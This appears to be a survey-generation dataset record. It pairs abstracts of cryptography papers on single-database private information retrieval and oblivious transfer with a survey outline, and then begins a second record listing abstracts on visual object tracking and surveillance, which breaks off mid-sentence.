length-flexible additively homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier’s cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K2) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = nƐ for some small Ɛ) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. ::: ::: An important implication of our result is that we can implement a 1-out-of- n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Batch codes and their applications paper_content: A batch code encodes a string x into an m-tuple of strings, called buckets, such that each batch of k bits from x can be decoded by reading at most one (more generally, t) bits from each bucket. Batch codes can be viewed as relaxing several combinatorial objects, including expanders and locally decodable codes. We initiate the study of these codes by presenting some constructions, connections with other problems, and lower bounds. We also demonstrate the usefulness of batch codes by presenting two types of applications: trading maximal load for storage in certain load-balancing scenarios, and amortizing the computational cost of private information retrieval (PIR) and related cryptographic protocols. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: Single Database Private Information Retrieval Implies Oblivious Transfer paper_content: A Single-Database Private Information Retrieval (PIR) is a protocol that allows a user to privately retrieve from a database an entry with as small as possible communication complexity. We call a PIR protocol non-trivial if its total communication is strictly less than the size of the database. Non-trivial PIR is an important cryptographic primitive with many applications. Thus, understanding which assumptions are necessary for implementing such a primitive is an important task, although (so far) not a well-understood one. In this paper we show that any non-trivial PIR implies Oblivious Transfer, a far better understood primitive. Our result not only significantly clarifies our understanding of any non-trivial PIR protocol, but also yields the following consequences: - Any non-trivial PIR is complete for all two-party and multiparty secure computations. - There exists a communication-efficient reduction from any PIR protocol to a 1-out-of-n Oblivious Transfer protocol (also called SPIR). - There is strong evidence that the assumption of the existence of a one-way function is necessary but not sufficient for any non-trivial PIR protocol. --- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K2) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = nƐ for some small Ɛ) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. ::: ::: An important implication of our result is that we can implement a 1-out-of- n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Private Searching on Streaming Data paper_content: In this paper we consider the problem of private searching on streaming data, where we can efficiently implement searching for documents that satisfy a secret criteria (such as the presence or absence of a hidden combination of hidden keywords) under various cryptographic assumptions. Our results can be viewed in a variety of ways: as a generalization of the notion of private information retrieval (to more general queries and to a streaming environment); as positive results on privacy-preserving datamining; and as a delegation of hidden program computation to other machines. --- paper_title: A Generalisation, a Simplification and some Applications of Paillier’s Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits. --- paper_title: Succinct Non-Interactive Zero-Knowledge Proofs with Preprocessing for LOGSNP paper_content: Let \Lambda : {0, 1}^n ? {0, 1}^m \to {0, 1} be a Boolean formula of size d, or more generally, an arithmetic circuit of degree d, known to both Alice and Bob, and let y \in {0, 1}^m be an input known only to Alice. Assume that Alice and Bob interacted in the past in a preamble phase (that is, applied a preamble protocol that depends only on the parameters, and not on \Lambda, y). We show that Alice can (non-interactively) commit to y, by a message of size poly(m, log d), and later on prove to Bob any N statements of the form \Lambda(x_1, y) = z_1, . . . , \Lambda(x_{N}, y) = z_N by a (computationally sound) non-interactive zero-knowledge proof of size poly(d, logN). (Note the logarithmic dependence on N). We give many applications and motivations for this result. In particular, assuming that Alice and Bob applied in the past the (poly-logarithmic size) preamble protocol: 1. Given a CNF formula \Psi(w_1, . . . , w_m ) of size N, Alice can prove the satisfiability of \Psi by a (computationally sound) non-interactive zero-knowledge proof of size poly(m). That is, the size of the proof depends only on the size of the witness and not on the size of the formula. 2. Given a language L in the class LOGSNP and an input x \in {0,|1}^n , Alice can prove the membership x \in L by a (computationally sound) non-interactive zero-knowledge proof of size polylogn. 3. Alice can commit to a Boolean formula y of size m, by a message of size poly(m), and later on prove to Bob any N statements of the form y(x_1 ) = z_1 , . . . , y(x_N ) = z_N by a (computationally sound) non-interactive zero-knowledge proof of size poly(m, logN). Our cryptographic assumptions include the existence of a poly-logarithmic Symmetric-Private-Information- Retrieval (SPIR) scheme, as defined in [4], and the existence of commitment schemes, secure against circuits of size exponential in the security parameter. --- paper_title: Software protection and simulation on oblivious RAMs paper_content: Software protection is one of the most important issues concerning computer practice. There exist many heuristics and ad-hoc methods for protection, but the problem as a whole has not received the theoretical treatment it deserves. In this paper, we provide theoretical treatment of software protection. We reduce the problem of software protection to the problem of efficient simulation on oblivious RAM. A machine is oblivious if thhe sequence in which it accesses memory locations is equivalent for any two inputs with the same running time. For example, an oblivious Turing Machine is one for which the movement of the heads on the tapes is identical for each computation. (Thus, the movement is independent of the actual input.) What is the slowdown in the running time of a machine, if it is required to be oblivious? In 1979, Pippenger and Fischer showed how a two-tape oblivious Turing Machine can simulate, on-line, a one-tape Turing Machine, with a logarithmic slowdown in the running time. We show an analogous result for the random-access machine (RAM) model of computation. In particular, we show how to do an on-line simulation of an arbitrary RAM by a probabilistic oblivious RAM with a polylogaithmic slowdown in the running time. On the other hand, we show that a logarithmic slowdown is a lower bound. --- paper_title: On the Compressibility of NP Instances and Cryptographic Applications paper_content: We initiate the study of compression that preserves the solution to an instance of a problem rather than preserving the instance itself. Our focus is on the compressibility of NP decision problems. We consider NP problems that have long instances but relatively short witnesses. The question is, can one efficiently compress an instance and store a shorter representation that maintains the information of whether the original input is in the language or not. We want the length of the compressed instance to be polynomial in the length of the witness rather than the length of original input. Such compression enables to succinctly store instances until a future setting will allow solving them, either via a technological or algorithmic breakthrough or simply until enough time has elapsed. We give a new classification of NP with respect to compression. This classification forms a stratification of NP that we call the VC hierarchy. The hierarchy is based on a new type of reduction called W-reduction and there are compression-complete problems for each class. Our motivation for studying this issue stems from the vast cryptographic implications compressibility has. For example, we say that SAT is compressible if there exists a polynomial p(middot, middot) so that given a formula consisting of m clauses over n variables it is possible to come up with an equivalent (w.r.t satisfiability) formula of size at most p(n, log m). Then given a compression algorithm for SAT we provide a construction of collision resistant hash functions from any one-way function. This task was shown to be impossible via black-box reductions (D. Simon, 1998), and indeed the construction presented is inherently non-black-box. Another application of SAT compressibility is a cryptanalytic result concerning the limitation of everlasting security in the bounded storage model when mixed with (time) complexity based cryptography. In addition, we study an approach to constructing an oblivious transfer protocol from any one-way function. This approach is based on compression for SAT that also has a property that we call witness retrievability. However, we mange to prove severe limitations on the ability to achieve witness retrievable compression of SAT --- paper_title: Algebraic Lower Bounds for Computing on Encrypted Data paper_content: In cryptography, there has been tremendous success in building primitives out of homomorphic semantically-secure encryption schemes, using homomorphic properties in a black-box way. A few notable examples of such primitives include items like private information retrieval schemes and collision-resistant hash functions (e.g. [14, 6, 13]). In this paper, we illustrate a general methodology for determining what types of protocols can be implemented in this way and which cannot. This is accomplished by analyzing the computational power of various algebraic structures which are preserved by existing cryptosystems. More precisely, we demonstrate lower bounds for algebraically generating generalized characteristic vectors over certain algebraic structures, and subsequently we show how to directly apply this abstract algebraic results to put lower bounds on algebraic constructions of a number of cryptographic protocols, including PIR-writing and private keyword search protocols. We hope that this work will provide a simple “litmus test” of feasibility for use by other cryptographic researchers attempting to develop new protocols that require computation on encrypted data. Additionally, a precise mathematical language for reasoning about such problems is developed in this work, which may be of independent interest. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(klog2n+llogn), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying length-flexible additively homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier’s cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: Replication is not needed: single database, computationally-private information retrieval paper_content: We establish the following, quite unexpected, result: replication of data for the computational private information retrieval problem is not necessary. More specifically, based on the quadratic residuosity assumption, we present a single database, computationally private information retrieval scheme with O(n/sup /spl epsiv//) communication complexity for any /spl epsiv/>0. --- paper_title: A Generalisation, a Simplification and some Applications of Paillier’s Probabilistic Public-Key System paper_content: We propose a generalisation of Paillier's probabilistic public key system, in which the expansion factor is reduced and which allows to adjust the block length of the scheme even after the public key has been fixed, without losing the homomorphic property. We show that the generalisation is as secure as Paillier's original system. We construct a threshold variant of the generalised scheme as well as zero-knowledge protocols to show that a given ciphertext encrypts one of a set of given plaintexts, and protocols to verify multiplicative relations on plaintexts. We then show how these building blocks can be used for applying the scheme to efficient electronic voting. This reduces dramatically the work needed to compute the final result of an election, compared to the previously best known schemes. We show how the basic scheme for a yes/no vote can be easily adapted to casting a vote for up to t out of L candidates. The same basic building blocks can also be adapted to provide receipt-free elections, under appropriate physical assumptions. The scheme for 1 out of L elections can be optimised such that for a certain range of parameter values, a ballot has size only O(log L) bits. --- paper_title: An oblivious transfer protocol with log-squared communication paper_content: We propose a one-round 1-out-of-n computationally-private information retrieval protocol for l-bit strings with low-degree polylogarithmic receiver-computation, linear sender-computation and communication Θ(klog2n+llogn), where k is a possibly non-constant security parameter. The new protocol is receiver-private if the underlying length-flexible additively homomorphic public-key cryptosystem is IND-CPA secure. It can be transformed to a one-round computationally receiver-private and information-theoretically sender-private 1-out-of-n oblivious-transfer protocol for l-bit strings, that has the same asymptotic communication and is private in the standard complexity-theoretic model. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier’s cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: Universal one-way hash functions and their cryptographic applications paper_content: We define a Universal One-Way Hash Function family, a new primitive which enables the compression of elements in the function domain. The main property of this primitive is that given an element x . We prove constructively that universal one-way hash functions exist if any 1-1 one-way functions exist. Among the various applications of the primitive is a One-Way based Secure Digital Signature Scheme, a system which is based on the existence of any 1-1 One-Way Functions and is secure against the most general attack known. Previously, all provably secure signature schemes were based on the stronger mathematical assumption that trapdoor one-way functions exist. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Single Database Private Information Retrieval with Logarithmic Communication paper_content: We study the problem of single database private information retrieval, and present a solution with only logarithmic server-side communication complexity and a solution with only logarithmic user-side communication complexity. Previously the best result could only achieve polylogarithmic communication on each side, and was based on certain less well-studied assumptions in number theory [6]. On the contrary, our schemes are based on Paillier’s cryptosystem [16], which along with its variants have drawn extensive studies in recent cryptographic researches [3, 4, 8, 9], and have many important applications [7, 8]. --- paper_title: Computationally private information retrieval with polylogarithmic communication paper_content: We present a single-database computationally private information retrieval scheme with polylogarithmic communication complexity. Our construction is based on a new, but reasonable intractability assumption, which we call the φ-Hiding Assumption (φHA): essentially the difficulty of deciding whether a small prime divides φ(m), where m is a composite integer of unknown factorization. --- paper_title: Single-Database Private Information Retrieval with Constant Communication Rate paper_content: We present a single-database private information retrieval (PIR) scheme with communication complexity ${\mathcal O}(k+d)$, where k ≥ log n is a security parameter that depends on the database size n and d is the bit-length of the retrieved database block. This communication complexity is better asymptotically than previous single-database PIR schemes. The scheme also gives improved performance for practical parameter settings whether the user is retrieving a single bit or very large blocks. For large blocks, our scheme achieves a constant “rate” (e.g., 0.2), even when the user-side communication is very low (e.g., two 1024-bit numbers). Our scheme and security analysis is presented using general groups with hidden smooth subgroups; the scheme can be instantiated using composite moduli, in which case the security of our scheme is based on a simple variant of the “Φ-hiding” assumption by Cachin, Micali and Stadler [2]. --- paper_title: One-way trapdoor permutations are sufficient for non-trivial single-server private information retrieval paper_content: We show that general one-way trapdoor permutations are sufficient to privately retrieve an entry from a database of size n with total communication complexity strictly less than n. More specifically, we present a protocol in which the user sends O(K2) bits and the server sends n - cn/K bits (for any constant c), where K is the security parameter of the trapdoor permutations. Thus, for sufficiently large databases (e.g., when K = nƐ for some small Ɛ) our construction breaks the information-theoretic lower-bound (of at least n bits). This demonstrates the feasibility of basing single-server private information retrieval on general complexity assumptions. ::: ::: An important implication of our result is that we can implement a 1-out-of- n Oblivious Transfer protocol with communication complexity strictly less than n based on any one-way trapdoor permutation. --- paper_title: Universal one-way hash functions and their cryptographic applications paper_content: We define a Universal One-Way Hash Function family, a new primitive which enables the compression of elements in the function domain. The main property of this primitive is that given an element x . We prove constructively that universal one-way hash functions exist if any 1-1 one-way functions exist. Among the various applications of the primitive is a One-Way based Secure Digital Signature Scheme, a system which is based on the existence of any 1-1 One-Way Functions and is secure against the most general attack known. Previously, all provably secure signature schemes were based on the stronger mathematical assumption that trapdoor one-way functions exist. ---
Title: A survey of single-database private information retrieval: techniques and applications Section 1: Introduction Description 1: Write an introduction describing the basics of Single-Database Private Information Retrieval (PIR), its purpose, and the naive solution. Section 2: Single-Database PIR Description 2: Discuss the history and foundational works of Single-Database PIR, including significant contributions and key techniques used. Section 3: Amortizing Database Work in PIR Description 3: Explain how to amortize the computational work in PIR for multiple queries and the techniques involved in achieving this. Section 4: Connections: Single Database PIR and OT Description 4: Outline the connection between Single-Database PIR and Oblivious Transfer (OT), detailing the similarities and transformations between the two. Section 5: Connections: PIR and Collision-Resistant Hashing Description 5: Describe how PIR protocols relate to collision-resistant hashing and the implications of this connection. Section 6: Connections: PIR and Function-Hiding PKE Description 6: Discuss the relationship between PIR and function-hiding public-key encryption, and the use cases where function-hiding PKE is relevant. Section 7: Connections: PIR and Complexity Theory Description 7: Explore the connections between PIR and various complexity theory problems, including secure function evaluation and zero-knowledge arguments. Section 8: Public-Key Encryption That Supports PIR Read and Write Description 8: Explain the concept of public-key encryption schemes that allow for PIR queries and data modifications with small communication complexity. Section 9: Organization of the Rest of the Paper Description 9: Provide an outline of the remaining sections of the paper and the main focus areas. Section 10: Balancing the Communication Between Sender and Receiver Description 10: Discuss techniques for minimizing communication complexity in PIR protocols and how to balance communication between sender and receiver. Section 11: PIR Based on Group-Homomorphic Encryption Description 11: Present various PIR protocols based on group-homomorphic encryption, highlighting the generic methods and specific cryptosystems used. Section 12: Homomorphic Encryption Schemes Description 12: Explain the principles of homomorphic encryption schemes and their role in constructing PIR protocols. Section 13: PIR Based on the Φ-Hiding Assumption Description 13: Introduce the Φ-Hiding Assumption and describe its application in developing PIR protocols with logarithmic communication. Section 14: Preliminaries Description 14: Provide the necessary algebraic and cryptographic preliminaries required to understand the PIR protocols based on the Φ-Hiding Assumption. Section 15: A Brief Description of the Protocol Description 15: Give a high-level overview of the PIR protocol based on the Φ-Hiding Assumption, including key algorithmic steps. Section 16: Generalizations: Smooth Subgroups Description 16: Discuss the generalizations of PIR protocols based on smooth subgroups, including more advanced techniques and optimizations. Section 17: PIR from Any Trapdoor Permutation Description 17: Describe the construction of PIR protocols based on general trapdoor permutations and the communication-balancing techniques used. Section 18: Outline of the Protocol Description 18: Provide a high-level outline of the PIR protocol based on trapdoor permutations. Section 19: Sketch of Protocol Details Description 19: Provide more detailed steps and explanations of the PIR protocol based on trapdoor permutations. Section 20: Conclusions Description 20: Summarize the main findings and contributions of the paper, and mention open problems and future research directions in Single-Database PIR.
A survey of appearance models in visual object tracking
21
--- paper_title: Real-Time Face Detection and Tracking for Mobile Videoconferencing paper_content: This paper addresses the issue of face detection and tracking in the context of a mobile videoconferencing application. While the integration of such technology into a mobile videophone is advantageous, allowing face stabilization, reduced bandwidth requirements and smaller display sizes, its deployment in such an environment may not be straightforward, since most face detection methods reported in the literature assume at least modest processing capabilities and memory and, usually, floating-point capabilities. The face detection and tracking method which is presented here achieves high performance, robustness to illumination variations and geometric changes, such as viewpoint and scale changes, and at the same time entails a significantly reduced computational complexity. Our method requires only integer operations and very small amounts of memory, of the order of a few hundred bytes, facilitating a real-time implementation on small microprocessors or custom hardware. In this context, this paper will also examine an FPGA implementation of the proposed algorithmic framework which, as will be seen, achieves extremely high frame processing rates at low clock speeds. --- paper_title: A system for video surveillance and monitoring paper_content: Under the three-year Video Surveillance and Monitoring (VSAM) project (1997‐1999), the Robotics Institute at Carnegie Mellon University (CMU) and the Sarnoff Corporation developed a system for autonomous Video Surveillance and Monitoring. The technical approach uses multiple, cooperative video sensors to provide continuous coverage of people and vehicles in a cluttered environment. This final report presents an overview of the system, and of the technical accomplishments that have been achieved. --- paper_title: A Novel Method for Tracking and Counting Pedestrians in Real-Time Using a Single Camera paper_content: This paper presents a real-time system for pedestrian tracking in sequences of grayscale images acquired by a stationary camera. The objective is to integrate this system with a traffic control application such as a pedestrian control scheme at intersections. The proposed approach can also be used to detect and track humans in front of vehicles. Furthermore, the proposed schemes can be employed for the detection of several diverse traffic objects of interest (vehicles, bicycles, etc.) The system outputs the spatio-temporal coordinates of each pedestrian during the period the pedestrian is in the scene. Processing is done at three levels: raw images, blobs, and pedestrians. Blob tracking is modeled as a graph optimization problem. Pedestrians are modeled as rectangular patches with a certain dynamic behavior. Kalman filtering is used to estimate pedestrian parameters. The system was implemented on a Datacube MaxVideo 20 equipped with a Datacube Max860 and was able to achieve a peak performance of over 30 frames per second. Experimental results based on indoor and outdoor scenes demonstrated the system s robustness under many difficult situations such as partial or full occlusions of pedestrians. --- paper_title: W4: Real-time surveillance of people and their activities paper_content: W/sup 4/ is a real time visual surveillance system for detecting and tracking multiple people and monitoring their activities in an outdoor environment. It operates on monocular gray-scale video imagery, or on video imagery from an infrared camera. W/sup 4/ employs a combination of shape analysis and tracking to locate people and their parts (head, hands, feet, torso) and to create models of people's appearance so that they can be tracked through interactions such as occlusions. It can determine whether a foreground region contains multiple people and can segment the region into its constituent people and track them. W/sup 4/ can also determine whether people are carrying objects, and can segment objects from their silhouettes, and construct appearance models for them so they can be identified in subsequent frames. W/sup 4/ can recognize events between people and objects, such as depositing an object, exchanging bags, or removing an object. It runs at 25 Hz for 320/spl times/240 resolution images on a 400 MHz dual-Pentium II PC. --- paper_title: Visual Interpretation of Hand Gestures for Human-Computer Interaction: A Review paper_content: The use of hand gestures provides an attractive alternative to cumbersome interface devices for human-computer interaction (HCI). In particular, visual interpretation of hand gestures can help in achieving the ease and naturalness desired for HCI. This has motivated a very active research area concerned with computer vision-based analysis and interpretation of hand gestures. We survey the literature on visual interpretation of hand gestures in the context of its role in HCI. This discussion is organized on the basis of the method used for modeling, analyzing, and recognizing gestures. Important differences in the gesture interpretation approaches arise depending on whether a 3D model of the human hand or an image appearance model of the human hand is used. 3D hand models offer a way of more elaborate modeling of hand gestures but lead to computational hurdles that have not been overcome given the real-time requirements of HCI. Appearance-based models lead to computationally efficient "purposive" approaches that work well under constrained situations but seem to lack the generality desirable for HCI. We also discuss implemented gestural systems as well as other potential applications of vision-based gesture recognition. Although the current progress is encouraging, further theoretical as well as computational advances are needed before gestures can be widely used for HCI. We discuss directions of future research in gesture recognition, including its integration with other natural modes of human-computer interaction. --- paper_title: Linear Regression and Adaptive Appearance Models for Fast Simultaneous Modelling and Tracking paper_content: This work proposes an approach to tracking by regression that uses no hard-coded models and no offline learning stage. The Linear Predictor (LP) tracker has been shown to be highly computationally efficient, resulting in fast tracking. Regression tracking techniques tend to require offline learning to learn suitable regression functions. This work removes the need for offline learning and therefore increases the applicability of the technique. The online-LP tracker can simply be seeded with an initial target location, akin to the ubiquitous Lucas-Kanade algorithm that tracks by registering an image template via minimisation. ::: ::: A fundamental issue for all trackers is the representation of the target appearance and how this representation is able to adapt to changes in target appearance over time. The two proposed methods, LP-SMAT and LP-MED, demonstrate the ability to adapt to large appearance variations by incrementally building an appearance model that identifies modes or aspects of the target appearance and associates these aspects to the Linear Predictor trackers to which they are best suited. Experiments comparing and evaluating regression and registration techniques are presented along with performance evaluations favourably comparing the proposed tracker and appearance model learning methods to other state of the art simultaneous modelling and tracking approaches. --- paper_title: Crowd analysis: a survey paper_content: In the year 1999 the world population reached 6 billion, doubling the previous census estimate of 1960. Recently, the United States Census Bureau issued a revised forecast for world population showing a projected growth to 9.4 billion by 2050 (US Census Bureau, http://www.census.gov/ipc/www/worldpop.html). Different research disci- plines have studied the crowd phenomenon and its dynamics from a social, psychological and computational standpoint respectively. This paper presents a survey on crowd analysis methods employed in computer vision research and discusses perspectives from other research disciplines and how they can contribute to the computer vision approach. --- paper_title: Survey of Pedestrian Detection for Advanced Driver Assistance Systems paper_content: Advanced driver assistance systems (ADASs), and particularly pedestrian protection systems (PPSs), have become an active research area aimed at improving traffic safety. The major challenge of PPSs is the development of reliable on-board pedestrian detection systems. Due to the varying appearance of pedestrians (e.g., different clothes, changing size, aspect ratio, and dynamic shape) and the unstructured environment, it is very difficult to cope with the demanded robustness of this kind of system. Two problems arising in this research area are the lack of public benchmarks and the difficulty in reproducing many of the proposed methods, which makes it difficult to compare the approaches. As a result, surveying the literature by enumerating the proposals one--after-another is not the most useful way to provide a comparative point of view. Accordingly, we present a more convenient strategy to survey the different approaches. We divide the problem of detecting pedestrians from images into different processing steps, each with attached responsibilities. Then, the different proposed methods are analyzed and classified with respect to each processing stage, favoring a comparative viewpoint. Finally, discussion of the important topics is presented, putting special emphasis on the future needs and challenges. --- paper_title: Research on Intelligent Visual Surveillance for Public Security paper_content: Intelligent visual surveillance plays an important role in the assurance of the public security, it is different from traditional passive video surveillance, it transforms the computer role from "Looking at People" to "Understanding People". In the paper, we review advances in intelligent visual surveillance, and present some future research directions. --- paper_title: On-road vehicle detection: a review paper_content: Developing on-board automotive driver assistance systems aiming to alert drivers about driving environments, and possible collision with other vehicles has attracted a lot of attention lately. In these systems, robust and reliable vehicle detection is a critical step. This paper presents a review of recent vision-based on-road vehicle detection systems. Our focus is on systems where the camera is mounted on the vehicle rather than being fixed such as in traffic/driveway monitoring systems. First, we discuss the problem of on-road vehicle detection using optical sensors followed by a brief review of intelligent vehicle research worldwide. Then, we discuss active and passive sensors to set the stage for vision-based vehicle detection. Methods aiming to quickly hypothesize the location of vehicles in an image as well as to verify the hypothesized locations are reviewed next. Integrating detection with tracking is also reviewed to illustrate the benefits of exploiting temporal continuity for vehicle detection. Finally, we present a critical overview of the methods discussed, we assess their potential for future deployment, and we present directions for future research. --- paper_title: Understanding Transit Scenes: A Survey on Human Behavior-Recognition Algorithms paper_content: Visual surveillance is an active research topic in image processing. Transit systems are actively seeking new or improved ways to use technology to deter and respond to accidents, crime, suspicious activities, terrorism, and vandalism. Human behavior-recognition algorithms can be used proactively for prevention of incidents or reactively for investigation after the fact. This paper describes the current state-of-the-art image-processing methods for automatic-behavior-recognition techniques, with focus on the surveillance of human activities in the context of transit applications. The main goal of this survey is to provide researchers in the field with a summary of progress achieved to date and to help identify areas where further research is needed. This paper provides a thorough description of the research on relevant human behavior-recognition methods for transit surveillance. Recognition methods include single person (e.g., loitering), multiple-person interactions (e.g., fighting and personal attacks), person-vehicle interactions (e.g., vehicle vandalism), and person-facility/location interactions (e.g., object left behind and trespassing). A list of relevant behavior-recognition papers is presented, including behaviors, data sets, implementation details, and results. In addition, algorithm's weaknesses, potential research directions, and contrast with commercial capabilities as advertised by manufacturers are discussed. This paper also provides a summary of literature surveys and developments of the core technologies (i.e., low-level processing techniques) used in visual surveillance systems, including motion detection, classification of moving objects, and tracking. --- paper_title: Object tracking: A survey paper_content: The goal of this article is to review the state-of-the-art tracking methods, classify them into different categories, and identify new trends. Object tracking, in general, is a challenging problem. Difficulties in tracking objects can arise due to abrupt object motion, changing appearance patterns of both the object and the scene, nonrigid object structures, object-to-object and object-to-scene occlusions, and camera motion. Tracking is usually performed in the context of higher-level applications that require the location and/or shape of the object in every frame. Typically, assumptions are made to constrain the tracking problem in the context of a particular application. In this survey, we categorize the tracking methods on the basis of the object and motion representations used, provide detailed descriptions of representative methods in each category, and examine their pros and cons. Moreover, we discuss the important issues related to tracking including the use of appropriate image features, selection of motion models, and detection of objects. --- paper_title: Modeling inter-camera space – time and appearance relationships for tracking across non-overlapping views paper_content: Tracking across cameras with non-overlapping views is a challenging problem. Firstly, the observations of an object are often widely separated in time and space when viewed from non-overlapping cameras. Secondly, the appearance of an object in one camera view might be very different from its appearance in another camera view due to the differences in illumination, pose and camera properties. To deal with the first problem, we observe that people or vehicles tend to follow the same paths in most cases, i.e., roads, walkways, corridors etc. The proposed algorithm uses this conformity in the traversed paths to establish correspondence. The algorithm learns this conformity and hence the inter-camera relationships in the form of multivariate probability density of space-time variables (entry and exit locations, velocities, and transition times) using kernel density estimation. To handle the appearance change of an object as it moves from one camera to another, we show that all brightness transfer functions from a given camera to another camera lie in a low dimensional subspace. This subspace is learned by using probabilistic principal component analysis and used for appearance matching. The proposed approach does not require explicit inter-camera calibration, rather the system learns the camera topology and subspace of inter-camera brightness transfer functions during a training phase. Once the training is complete, correspondences are assigned using the maximum likelihood (ML) estimation framework using both location and appearance cues. Experiments with real world videos are reported which validate the proposed approach. --- paper_title: D.: Computational Studies of Human Motion: Part 1, Tracking and Motion Synthesis paper_content: We review methods for kinematic tracking of the human body in video. The review is part of a projected book that is intended to cross-fertilize ideas about motion representation between the animation and computer vision communities. The review confines itself to the earlier stages of motion, focusing on tracking and motion synthesis; future material will cover activity representation and motion generation. --- paper_title: A Review of Visual Tracking paper_content: This report contains a review of visual tracking in monocular video sequences. For the purpose of this review, the majority of the visual trackers in the literature are divided into three tracking categories: discrete feature trackers, contour trackers, and region-based trackers. This categorization was performed based on the features used and the algorithms employed by the various visual trackers. The first class of trackers represents targets as discrete features (e.g. points, sets of points, lines) and performs data association using a distance metric that accommodates the particular feature. Contour trackers provide precise outlines of the target boundaries, meaning that they must not only uncover the position of the target, but its shape as well. Contour trackers often make use of gradient edge information during the tracking process. Region trackers represent the target with area-based descriptors that define its support and attempt to locate the image region in the current frame that best matches an object template. Trackers that are not in agreement with the abovementioned categorization, including those that combine methods from the three defined classes, are also considered in this review. In addition to categorizing and describing the various visual trackers in the literature, this review also provides a commentary on the current state of the field as well as a comparative analysis of the various approaches. The paper concludes with an outline of open problems in visual tracking. --- paper_title: Crowd analysis: a survey paper_content: In the year 1999 the world population reached 6 billion, doubling the previous census estimate of 1960. Recently, the United States Census Bureau issued a revised forecast for world population showing a projected growth to 9.4 billion by 2050 (US Census Bureau, http://www.census.gov/ipc/www/worldpop.html). Different research disci- plines have studied the crowd phenomenon and its dynamics from a social, psychological and computational standpoint respectively. This paper presents a survey on crowd analysis methods employed in computer vision research and discusses perspectives from other research disciplines and how they can contribute to the computer vision approach. --- paper_title: Survey of Pedestrian Detection for Advanced Driver Assistance Systems paper_content: Advanced driver assistance systems (ADASs), and particularly pedestrian protection systems (PPSs), have become an active research area aimed at improving traffic safety. The major challenge of PPSs is the development of reliable on-board pedestrian detection systems. Due to the varying appearance of pedestrians (e.g., different clothes, changing size, aspect ratio, and dynamic shape) and the unstructured environment, it is very difficult to cope with the demanded robustness of this kind of system. Two problems arising in this research area are the lack of public benchmarks and the difficulty 